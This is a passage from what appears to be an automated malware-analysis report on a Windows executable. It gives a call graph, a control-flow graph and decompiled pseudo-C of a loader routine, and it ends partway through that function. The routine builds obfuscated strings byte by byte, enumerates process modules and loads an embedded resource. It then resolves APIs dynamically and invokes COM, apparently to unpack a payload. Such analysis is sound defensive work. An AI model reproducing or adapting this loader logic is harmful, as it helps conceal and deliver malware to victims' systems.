library calls 25716->25907 25791 412892 25717->25791 25720 40cc71 25720->25717 25724 40cc97 25827 41255f 25724->25827 25728 40cca8 25842 40e859 25728->25842 25731 40ccb0 25732 40ccbb 25731->25732 25910 40e79a 63 API calls 3 library calls 25731->25910 25848 4019f0 OleInitialize 25732->25848 25735 40ccd8 25736 40ccea 25735->25736 25902 40ea0a 25735->25902 25911 40ea36 63 API calls _doexit 25736->25911 25739 40ccef __calloc_impl 25741 40cc3a 25740->25741 25741->25709 25905 40cbb4 63 API calls 3 library calls 25741->25905 25743 410892 25742->25743 25744 410899 25742->25744 25912 40e76a Sleep GetModuleHandleW 25743->25912 25746 410a01 25744->25746 25747 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 25744->25747 25934 410598 7 API calls __decode_pointer 25746->25934 25749 4108ec TlsAlloc 25747->25749 25748 410898 25748->25744 25752 40cc4c 25749->25752 25753 41093a TlsSetValue 25749->25753 25752->25713 25906 40cbb4 63 API calls 3 library calls 25752->25906 25753->25752 25754 41094b 25753->25754 25913 40ea54 6 API calls 4 library calls 25754->25913 25756 410950 25914 41046e TlsGetValue 25756->25914 25759 41046e __encode_pointer 6 API calls 25760 41096b 25759->25760 25761 41046e __encode_pointer 6 API calls 25760->25761 25762 41097b 25761->25762 25763 41046e __encode_pointer 6 API calls 25762->25763 25764 41098b 25763->25764 25924 40d564 InitializeCriticalSectionAndSpinCount __alloc_osfhnd 25764->25924 25766 410998 25766->25746 25925 4104e9 6 API calls __crt_waiting_on_module_handle 25766->25925 25768 4109ac 25768->25746 25926 411cba 25768->25926 25772 4109df 25772->25746 25773 4109e6 25772->25773 25933 4105d5 63 API calls 5 library calls 25773->25933 25775 4109ee GetCurrentThreadId 25775->25752 25963 40e1d8 25776->25963 25778 411a21 GetStartupInfoA 25779 411cba __calloc_crt 63 API calls 25778->25779 25785 411a42 25779->25785 25780 411c60 __calloc_impl 25780->25716 25781 411bdd GetStdHandle 25787 411ba7 25781->25787 25782 411cba __calloc_crt 63 API calls 25782->25785 25783 411c42 SetHandleCount 25783->25780 25784 411bef GetFileType 25784->25787 25785->25780 25785->25782 25786 411b2a 25785->25786 25785->25787 25786->25780 25786->25787 25789 411b53 GetFileType 25786->25789 25964 41389c InitializeCriticalSectionAndSpinCount __calloc_impl 25786->25964 25787->25780 25787->25781 25787->25783 25787->25784 25965 41389c InitializeCriticalSectionAndSpinCount __calloc_impl 25787->25965 25789->25786 25792 4128b0 GetEnvironmentStringsW 25791->25792 25793 4128cf 25791->25793 25794 4128c4 GetLastError 25792->25794 25795 4128b8 25792->25795 25793->25795 25796 412968 25793->25796 25794->25793 25797 4128eb GetEnvironmentStringsW 25795->25797 25798 4128fa WideCharToMultiByte 25795->25798 25799 412971 GetEnvironmentStrings 25796->25799 25800 40cc82 25796->25800 25797->25798 25797->25800 25803 41295d FreeEnvironmentStringsW 25798->25803 25804 41292e 25798->25804 25799->25800 25801 412981 25799->25801 25816 4127d7 25800->25816 25806 411c75 __malloc_crt 63 API calls 25801->25806 25803->25800 25966 411c75 25804->25966 25807 41299b 25806->25807 25809 4129a2 FreeEnvironmentStringsA 25807->25809 25810 4129ae _realloc 25807->25810 25809->25800 25814 4129b8 FreeEnvironmentStringsA 25810->25814 25811 41293c WideCharToMultiByte 25812 412956 25811->25812 25813 41294e 25811->25813 25812->25803 25972 40b6b5 63 API calls 2 library calls 25813->25972 25814->25800 25817 4127f1 GetModuleFileNameA 25816->25817 25818 4127ec 25816->25818 25820 412818 25817->25820 26012 41446b 107 API calls __setmbcp 25818->26012 26006 41263d 25820->26006 25823 411c75 __malloc_crt 63 API calls 25824 41285a 25823->25824 25825 41263d _parse_cmdline 73 API calls 25824->25825 25826 40cc8c 25824->25826 25825->25826 25826->25724 25908 40e79a 63 API calls 3 library calls 25826->25908 25828 412568 25827->25828 25830 41256d _strlen 25827->25830 26014 41446b 107 API calls __setmbcp 25828->26014 25831 411cba __calloc_crt 63 API calls 25830->25831 25834 40cc9d 25830->25834 25837 4125a2 _strlen 25831->25837 25832 412600 26017 40b6b5 63 API calls 2 library calls 25832->26017 25834->25728 25909 40e79a 63 API calls 3 library calls 25834->25909 25835 411cba __calloc_crt 63 API calls 25835->25837 25836 412626 26018 40b6b5 63 API calls 2 library calls 25836->26018 25837->25832 25837->25834 25837->25835 25837->25836 25840 4125e7 25837->25840 26015 40ef42 63 API calls __tsopen_nolock 25837->26015 25840->25837 26016 40e61c 10 API calls 3 library calls 25840->26016 25843 40e867 __IsNonwritableInCurrentImage 25842->25843 26019 413586 25843->26019 25845 40e885 __initterm_e 25847 40e8a4 __IsNonwritableInCurrentImage __initterm 25845->25847 26023 40d2bd 74 API calls __cinit 25845->26023 25847->25731 25849 401ab9 25848->25849 26024 40b99e 25849->26024 25851 401abf 25852 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 25851->25852 25881 402467 25851->25881 25853 401dc3 CloseHandle GetModuleHandleA 25852->25853 25861 401c55 25852->25861 26037 401650 25853->26037 25855 401e8b FindResourceA LoadResource LockResource SizeofResource 25856 40b84d _malloc 63 API calls 25855->25856 25857 401ebf 25856->25857 26039 40af66 25857->26039 25859 401c9c CloseHandle 25859->25735 25860 401ecb _memset 25862 401efc SizeofResource 25860->25862 25861->25859 25865 401cf9 Module32Next 25861->25865 25863 401f1c 25862->25863 25864 401f5f 25862->25864 25863->25864 26077 401560 __VEC_memcpy ___sbh_free_block 25863->26077 25867 401f92 _memset 25864->25867 26078 401560 __VEC_memcpy ___sbh_free_block 25864->26078 25865->25853 25874 401d0f 25865->25874 25869 401fa2 FreeResource 25867->25869 25870 40b84d _malloc 63 API calls 25869->25870 25871 401fbb SizeofResource 25870->25871 25872 401fe5 _memset 25871->25872 25873 4020aa LoadLibraryA 25872->25873 25875 401650 25873->25875 25874->25859 25877 401dad Module32Next 25874->25877 25876 40216c GetProcAddress 25875->25876 25878 4021aa 25876->25878 25876->25881 25877->25853 25877->25874 25878->25881 26051 4018f0 25878->26051 25881->25735 25882 4021f1 25901 40243f 25882->25901 26063 401870 25882->26063 25884 402269 VariantInit 25885 401870 76 API calls 25884->25885 25886 40228b VariantInit 25885->25886 25887 4022a7 25886->25887 25888 4022d9 SafeArrayCreate SafeArrayAccessData 25887->25888 26068 40b350 25888->26068 25891 40232c 25892 402354 SafeArrayDestroy 25891->25892 25893 40235b 25891->25893 25892->25893 25894 402392 SafeArrayCreateVector 25893->25894 25895 4023a4 25894->25895 25896 4023bc VariantClear VariantClear 25895->25896 26070 4019a0 25896->26070 25899 40242e 25900 4019a0 66 API calls 25899->25900 25900->25901 25901->25881 26079 40b6b5 63 API calls 2 library calls 25901->26079 26092 40e8de 25902->26092 25904 40ea1b 25904->25736 25905->25709 25906->25713 25907->25720 25908->25724 25909->25728 25910->25732 25911->25739 25912->25748 25913->25756 25915 4104a7 GetModuleHandleW 25914->25915 25916 410486 25914->25916 25918 4104c2 GetProcAddress 25915->25918 25919 4104b7 25915->25919 25916->25915 25917 410490 TlsGetValue 25916->25917 25922 41049b 25917->25922 25921 41049f 25918->25921 25935 40e76a Sleep GetModuleHandleW 25919->25935 25921->25759 25922->25915 25922->25921 25923 4104bd 25923->25918 25923->25921 25924->25766 25925->25768 25927 411cc3 25926->25927 25929 4109c5 25927->25929 25930 411ce1 Sleep 25927->25930 25936 40e231 25927->25936 25929->25746 25932 4104e9 6 API calls __crt_waiting_on_module_handle 25929->25932 25931 411cf6 25930->25931 25931->25927 25931->25929 25932->25772 25933->25775 25935->25923 25937 40e23d __calloc_impl 25936->25937 25938 40e274 _memset 25937->25938 25939 40e255 25937->25939 25943 40e2e6 RtlAllocateHeap 25938->25943 25944 40e26a __calloc_impl 25938->25944 25951 40d6e0 25938->25951 25958 40def2 5 API calls 2 library calls 25938->25958 25959 40e32d LeaveCriticalSection _doexit 25938->25959 25960 40d2e3 6 API calls __decode_pointer 25938->25960 25949 40bfc1 63 API calls __getptd_noexit 25939->25949 25941 40e25a 25950 40e744 6 API calls 2 library calls 25941->25950 25943->25938 25944->25927 25949->25941 25952 40d6f5 25951->25952 25953 40d708 EnterCriticalSection 25951->25953 25961 40d61d 63 API calls 10 library calls 25952->25961 25953->25938 25955 40d6fb 25955->25953 25962 40e79a 63 API calls 3 library calls 25955->25962 25957 40d707 25957->25953 25958->25938 25959->25938 25960->25938 25961->25955 25962->25957 25963->25778 25964->25786 25965->25787 25967 411c7e 25966->25967 25969 411cb4 25967->25969 25970 411c95 Sleep 25967->25970 25973 40b84d 25967->25973 25969->25803 25969->25811 25971 411caa 25970->25971 25971->25967 25971->25969 25972->25812 25974 40b900 25973->25974 25985 40b85f 25973->25985 26000 40d2e3 6 API calls __decode_pointer 25974->26000 25976 40b906 26001 40bfc1 63 API calls __getptd_noexit 25976->26001 25979 40b8f8 25979->25967 25982 40b8bc RtlAllocateHeap 25982->25985 25983 40b870 25983->25985 25991 40ec4d 63 API calls 2 library calls 25983->25991 25992 40eaa2 63 API calls 7 library calls 25983->25992 25993 40e7ee 25983->25993 25985->25979 25985->25982 25985->25983 25986 40b8ec 25985->25986 25989 40b8f1 25985->25989 25996 40b7fe 63 API calls 4 library calls 25985->25996 25997 40d2e3 6 API calls __decode_pointer 25985->25997 25998 40bfc1 63 API calls __getptd_noexit 25986->25998 25999 40bfc1 63 API calls __getptd_noexit 25989->25999 25991->25983 25992->25983 26002 40e7c3 GetModuleHandleW 25993->26002 25996->25985 25997->25985 25998->25989 25999->25979 26000->25976 26001->25979 26003 40e7d7 GetProcAddress 26002->26003 26004 40e7ec ExitProcess 26002->26004 26003->26004 26005 40e7e7 CorExitProcess 26003->26005 26005->26004 26008 41265c 26006->26008 26010 4126c9 26008->26010 26013 416836 73 API calls x_ismbbtype_l 26008->26013 26009 4127c7 26009->25823 26009->25826 26010->26009 26011 416836 73 API calls _parse_cmdline 26010->26011 26011->26010 26012->25817 26013->26008 26014->25830 26015->25837 26016->25840 26017->25834 26018->25834 26020 41358c 26019->26020 26021 41046e __encode_pointer 6 API calls 26020->26021 26022 4135a4 26020->26022 26021->26020 26022->25845 26023->25847 26027 40b9aa __calloc_impl _strnlen 26024->26027 26025 40b9b8 26080 40bfc1 63 API calls __getptd_noexit 26025->26080 26027->26025 26030 40b9ec 26027->26030 26028 40b9bd 26081 40e744 6 API calls 2 library calls 26028->26081 26031 40d6e0 __lock 63 API calls 26030->26031 26032 40b9f3 26031->26032 26082 40b917 121 API calls 3 library calls 26032->26082 26034 40b9ff 26083 40ba18 LeaveCriticalSection _doexit 26034->26083 26036 40b9cd __calloc_impl 26036->25851 26038 4017cc _realloc 26037->26038 26038->25855 26041 40af70 26039->26041 26040 40b84d _malloc 63 API calls 26040->26041 26041->26040 26042 40af8a 26041->26042 26046 40af8c std::bad_alloc::bad_alloc 26041->26046 26084 40d2e3 6 API calls __decode_pointer 26041->26084 26042->25860 26044 40afb2 26086 40af49 63 API calls std::exception::exception 26044->26086 26046->26044 26085 40d2bd 74 API calls __cinit 26046->26085 26047 40afbc 26087 40cd39 RaiseException 26047->26087 26050 40afca 26052 401903 lstrlenA 26051->26052 26053 4018fc 26051->26053 26088 4017e0 73 API calls 3 library calls 26052->26088 26053->25882 26055 40191f MultiByteToWideChar 26056 401940 GetLastError 26055->26056 26057 401996 26055->26057 26058 40194b MultiByteToWideChar 26056->26058 26059 40198d 26056->26059 26057->25882 26089 4017e0 73 API calls 3 library calls 26058->26089 26059->26057 26090 401030 GetLastError 26059->26090 26061 401970 MultiByteToWideChar 26061->26059 26064 40af66 75 API calls 26063->26064 26065 40187c 26064->26065 26066 401885 SysAllocString 26065->26066 26067 4018a4 26065->26067 26066->26067 26067->25884 26069 40231a SafeArrayUnaccessData 26068->26069 26069->25891 26071 4019aa InterlockedDecrement 26070->26071 26075 4019df VariantClear 26070->26075 26072 4019b8 26071->26072 26071->26075 26073 4019c2 SysFreeString 26072->26073 26072->26075 26076 4019c9 26072->26076 26073->26076 26075->25899 26091 40aec0 64 API calls 2 library calls 26076->26091 26077->25863 26078->25867 26079->25881 26080->26028 26082->26034 26083->26036 26084->26041 26085->26044 26086->26047 26087->26050 26088->26055 26089->26061 26091->26075 26093 40e8ea __calloc_impl 26092->26093 26094 40d6e0 __lock 63 API calls 26093->26094 26095 40e8f1 26094->26095 26096 40e9ba __initterm 26095->26096 26097 40e91d 26095->26097 26111 40e9f5 26096->26111 26116 4104e9 6 API calls __crt_waiting_on_module_handle 26097->26116 26101 40e928 26103 40e9aa __initterm 26101->26103 26117 4104e9 6 API calls __crt_waiting_on_module_handle 26101->26117 26102 40e9f2 __calloc_impl 26102->25904 26103->26096 26106 40e9e9 26107 40e7ee _fast_error_exit 4 API calls 26106->26107 26107->26102 26108 4104e9 6 API calls __decode_pointer 26110 40e93d 26108->26110 26109 4104e0 6 API calls ___crtMessageBoxW 26109->26110 26110->26103 26110->26108 26110->26109 26112 40e9d6 26111->26112 26113 40e9fb 26111->26113 26112->26102 26115 40d606 LeaveCriticalSection 26112->26115 26118 40d606 LeaveCriticalSection 26113->26118 26115->26106 26116->26101 26117->26110 26118->26112

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 20 401c98-401c9a 16->20 18 401c7d-401c83 17->18 19 401c8f-401c91 17->19 18->16 22 401c85-401c8d 18->22 19->20 23 401cb0-401cce call 401650 20->23 24 401c9c-401caf CloseHandle 20->24 22->14 22->19 34 401cd0-401cd4 23->34 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 44 401f33-401f5d call 401560 38->44 45 401f73-401f75 39->45 46 401f6b-401f72 39->46 40->36 47 401ce2-401cea 40->47 41->42 42->24 43 401cf9-401d09 Module32Next 42->43 43->7 48 401d0f 43->48 44->39 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 51 401f77-401f8d call 401560 45->51 46->45 47->34 47->41 52 401d10-401d2e call 401650 48->52 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 78 401da0-401da2 77->78 79 401d86-401d88 77->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 81->78 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->77 85->82 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 95 402482-402487 92->95 98 40221d-40223d 93->98 99 40244f-40245f 93->99 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 88d01c 122->152 153 40234e call 88d01d 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-40238f call 4018d0 133->135 134->135 154 402390 call 88d01c 135->154 155 402390 call 88d01d 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                                      C-Code - Quality: 77%
                                                                      			E004019F0(void* __edx, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				void* _t337;
                                                                      				void* _t340;
                                                                      				int _t341;
                                                                      				CHAR* _t344;
                                                                      				intOrPtr* _t349;
                                                                      				int _t350;
                                                                      				long _t352;
                                                                      				signed int _t354;
                                                                      				intOrPtr _t358;
                                                                      				long _t359;
                                                                      				CHAR* _t364;
                                                                      				struct HINSTANCE__* _t365;
                                                                      				CHAR* _t366;
                                                                      				_Unknown_base(*)()* _t367;
                                                                      				int _t368;
                                                                      				int _t369;
                                                                      				int _t370;
                                                                      				intOrPtr* _t376;
                                                                      				int _t378;
                                                                      				intOrPtr _t379;
                                                                      				intOrPtr* _t381;
                                                                      				int _t383;
                                                                      				intOrPtr* _t384;
                                                                      				int _t385;
                                                                      				int _t396;
                                                                      				int _t399;
                                                                      				int _t402;
                                                                      				int _t405;
                                                                      				intOrPtr* _t407;
                                                                      				int _t413;
                                                                      				int _t415;
                                                                      				void* _t421;
                                                                      				int _t422;
                                                                      				int _t424;
                                                                      				intOrPtr* _t428;
                                                                      				intOrPtr _t429;
                                                                      				intOrPtr* _t431;
                                                                      				int _t432;
                                                                      				int _t435;
                                                                      				intOrPtr* _t437;
                                                                      				int _t438;
                                                                      				intOrPtr* _t439;
                                                                      				int _t440;
                                                                      				int _t442;
                                                                      				signed int _t448;
                                                                      				signed int _t451;
                                                                      				signed int _t452;
                                                                      				int _t469;
                                                                      				int _t471;
                                                                      				int _t482;
                                                                      				signed int _t486;
                                                                      				intOrPtr* _t488;
                                                                      				intOrPtr* _t490;
                                                                      				intOrPtr* _t492;
                                                                      				intOrPtr _t493;
                                                                      				void* _t494;
                                                                      				struct HRSRC__* _t497;
                                                                      				void* _t514;
                                                                      				int _t519;
                                                                      				intOrPtr* _t520;
                                                                      				void* _t524;
                                                                      				void* _t525;
                                                                      				struct HINSTANCE__* _t526;
                                                                      				intOrPtr _t527;
                                                                      				void* _t531;
                                                                      				void* _t535;
                                                                      				struct HRSRC__* _t536;
                                                                      				intOrPtr* _t537;
                                                                      				intOrPtr* _t539;
                                                                      				int _t542;
                                                                      				int _t543;
                                                                      				intOrPtr* _t547;
                                                                      				intOrPtr* _t548;
                                                                      				intOrPtr* _t549;
                                                                      				intOrPtr* _t550;
                                                                      				void* _t551;
                                                                      				intOrPtr _t552;
                                                                      				int _t555;
                                                                      				void* _t556;
                                                                      				void* _t557;
                                                                      				void* _t558;
                                                                      				void* _t559;
                                                                      				void* _t560;
                                                                      				void* _t561;
                                                                      				void* _t562;
                                                                      				intOrPtr* _t563;
                                                                      				void* _t564;
                                                                      				void* _t565;
                                                                      				void* _t566;
                                                                      				void* _t567;
                                                                      
                                                                      				_t567 = __eflags;
                                                                      				_t494 = __edx;
                                                                      				__imp__OleInitialize(0); // executed
                                                                      				 *((char*)(_t556 + 0x18)) = 0xe0;
                                                                      				 *((char*)(_t556 + 0x19)) = 0x3b;
                                                                      				 *((char*)(_t556 + 0x1a)) = 0x8d;
                                                                      				 *((char*)(_t556 + 0x1b)) = 0x2a;
                                                                      				 *((char*)(_t556 + 0x1c)) = 0xa2;
                                                                      				 *((char*)(_t556 + 0x1d)) = 0x2a;
                                                                      				 *((char*)(_t556 + 0x1e)) = 0x2a;
                                                                      				 *((char*)(_t556 + 0x1f)) = 0x41;
                                                                      				 *((char*)(_t556 + 0x20)) = 0xd3;
                                                                      				 *((char*)(_t556 + 0x21)) = 0x20;
                                                                      				 *((char*)(_t556 + 0x22)) = 0x64;
                                                                      				 *((char*)(_t556 + 0x23)) = 6;
                                                                      				 *((char*)(_t556 + 0x24)) = 0x8a;
                                                                      				 *((char*)(_t556 + 0x25)) = 0xf7;
                                                                      				 *((char*)(_t556 + 0x26)) = 0x3d;
                                                                      				 *((char*)(_t556 + 0x27)) = 0x9d;
                                                                      				 *((char*)(_t556 + 0x28)) = 0xd9;
                                                                      				 *((char*)(_t556 + 0x29)) = 0xee;
                                                                      				 *((char*)(_t556 + 0x2a)) = 0x15;
                                                                      				 *((char*)(_t556 + 0x2b)) = 0x68;
                                                                      				 *((char*)(_t556 + 0x2c)) = 0xf4;
                                                                      				 *((char*)(_t556 + 0x2d)) = 0x76;
                                                                      				 *((char*)(_t556 + 0x2e)) = 0xb9;
                                                                      				 *((char*)(_t556 + 0x2f)) = 0x34;
                                                                      				 *((char*)(_t556 + 0x30)) = 0xbf;
                                                                      				 *((char*)(_t556 + 0x31)) = 0x1e;
                                                                      				 *((char*)(_t556 + 0x32)) = 0xe7;
                                                                      				 *((char*)(_t556 + 0x33)) = 0x78;
                                                                      				 *((char*)(_t556 + 0x34)) = 0x98;
                                                                      				 *((char*)(_t556 + 0x35)) = 0xe9;
                                                                      				 *((char*)(_t556 + 0x36)) = 0x6f;
                                                                      				 *((char*)(_t556 + 0x37)) = 0xb4;
                                                                      				 *((char*)(_t556 + 0x38)) = 0;
                                                                      				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                                                                      				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                                                                      				_t557 = _t556 + 0xc;
                                                                      				if(_t337 == 0x41b2a0) {
                                                                      					L80:
                                                                      					__eflags = 0;
                                                                      					return 0;
                                                                      				} else {
                                                                      					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                                                                      					_t525 = _t340;
                                                                      					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                                                                      					 *((char*)(_t557 + 0x64)) = 0xce;
                                                                      					 *((char*)(_t557 + 0x65)) = 0x27;
                                                                      					 *((char*)(_t557 + 0x66)) = 0x9c;
                                                                      					 *((char*)(_t557 + 0x67)) = 0x1a;
                                                                      					 *((char*)(_t557 + 0x68)) = 0x95;
                                                                      					 *((char*)(_t557 + 0x69)) = 0x2e;
                                                                      					 *((char*)(_t557 + 0x6a)) = 0x22;
                                                                      					 *((char*)(_t557 + 0x6b)) = 0x57;
                                                                      					 *((char*)(_t557 + 0x6c)) = 0x91;
                                                                      					 *((char*)(_t557 + 0x6d)) = 0x21;
                                                                      					 *((char*)(_t557 + 0x6e)) = 0x57;
                                                                      					 *((char*)(_t557 + 0x6f)) = 0x3a;
                                                                      					 *((char*)(_t557 + 0x70)) = 0xf8;
                                                                      					 *((char*)(_t557 + 0x71)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x72)) = 0x5b;
                                                                      					 *((char*)(_t557 + 0x73)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x74)) = 0xb5;
                                                                      					 *((char*)(_t557 + 0x75)) = 0x87;
                                                                      					 *((char*)(_t557 + 0x76)) = 0x7b;
                                                                      					 *((char*)(_t557 + 0x77)) = 0xf;
                                                                      					 *((char*)(_t557 + 0x78)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x79)) = 0x76;
                                                                      					 *((char*)(_t557 + 0x7a)) = 0xb9;
                                                                      					 *((char*)(_t557 + 0x7b)) = 0x34;
                                                                      					 *((char*)(_t557 + 0x7c)) = 0xbf;
                                                                      					 *((char*)(_t557 + 0x7d)) = 0x1e;
                                                                      					 *((char*)(_t557 + 0x7e)) = 0xe7;
                                                                      					 *((char*)(_t557 + 0x7f)) = 0x78;
                                                                      					 *((char*)(_t557 + 0x80)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x81)) = 0xe9;
                                                                      					 *((char*)(_t557 + 0x82)) = 0x6f;
                                                                      					 *((char*)(_t557 + 0x83)) = 0xb4;
                                                                      					 *((char*)(_t557 + 0x84)) = 0;
                                                                      					 *((char*)(_t557 + 0x18)) = 0xc0;
                                                                      					 *((char*)(_t557 + 0x19)) = 0x38;
                                                                      					 *((char*)(_t557 + 0x1a)) = 0x8d;
                                                                      					 *((char*)(_t557 + 0x1b)) = 0x1f;
                                                                      					 *((char*)(_t557 + 0x1c)) = 0x8e;
                                                                      					 *((char*)(_t557 + 0x1d)) = 0x30;
                                                                      					 *((char*)(_t557 + 0x1e)) = 0x65;
                                                                      					 *((char*)(_t557 + 0x1f)) = 0x47;
                                                                      					 *((char*)(_t557 + 0x20)) = 0xd3;
                                                                      					 *((char*)(_t557 + 0x21)) = 0x29;
                                                                      					 *((char*)(_t557 + 0x22)) = 0x3b;
                                                                      					 *((char*)(_t557 + 0x23)) = 0x56;
                                                                      					 *((char*)(_t557 + 0x24)) = 0xf8;
                                                                      					 *((char*)(_t557 + 0x25)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x26)) = 0x5b;
                                                                      					 *((char*)(_t557 + 0x27)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x28)) = 0xb5;
                                                                      					 *((char*)(_t557 + 0x29)) = 0x87;
                                                                      					 *((char*)(_t557 + 0x2a)) = 0x7b;
                                                                      					 *((char*)(_t557 + 0x2b)) = 0xf;
                                                                      					 *((char*)(_t557 + 0x2c)) = 0xf4;
                                                                      					 *((char*)(_t557 + 0x2d)) = 0x76;
                                                                      					 *((char*)(_t557 + 0x2e)) = 0xb9;
                                                                      					 *((char*)(_t557 + 0x2f)) = 0x34;
                                                                      					 *((char*)(_t557 + 0x30)) = 0xbf;
                                                                      					 *((char*)(_t557 + 0x31)) = 0x1e;
                                                                      					 *((char*)(_t557 + 0x32)) = 0xe7;
                                                                      					 *((char*)(_t557 + 0x33)) = 0x78;
                                                                      					 *((char*)(_t557 + 0x34)) = 0x98;
                                                                      					 *((char*)(_t557 + 0x35)) = 0xe9;
                                                                      					 *((char*)(_t557 + 0x36)) = 0x6f;
                                                                      					 *((char*)(_t557 + 0x37)) = 0xb4;
                                                                      					 *((char*)(_t557 + 0x38)) = 0;
                                                                      					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                                                                      					if(_t341 == 0) {
                                                                      						L38:
                                                                      						CloseHandle(_t525);
                                                                      						_t526 = GetModuleHandleA(0);
                                                                      						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                      						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                      						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                      						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                      						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                      						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                      						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                      						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                      						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                      						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                      						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                      						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                      						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                      						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                      						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                      						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                      						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                      						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                      						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                      						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                      						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                      						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                      						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                      						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                      						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                      						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                      						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                      						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                      						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                      						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                      						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                      						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                      						 *((char*)(_t557 + 0x3c)) = 0;
                                                                      						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                      						_t558 = _t557 + 8;
                                                                      						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                      						 *(_t558 + 0x50) = _t536;
                                                                      						_t551 = LoadResource(_t526, _t536);
                                                                      						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                      						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                      						_push(0x40022);
                                                                      						_t537 = _t349; // executed
                                                                      						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                      						_t559 = _t558 + 8;
                                                                      						 *(_t559 + 0x34) = _t350;
                                                                      						__eflags = _t350;
                                                                      						if(_t350 == 0) {
                                                                      							 *(_t559 + 0x50) = 0;
                                                                      						} else {
                                                                      							E0040BA30(_t526, _t350, 0, 0x40022);
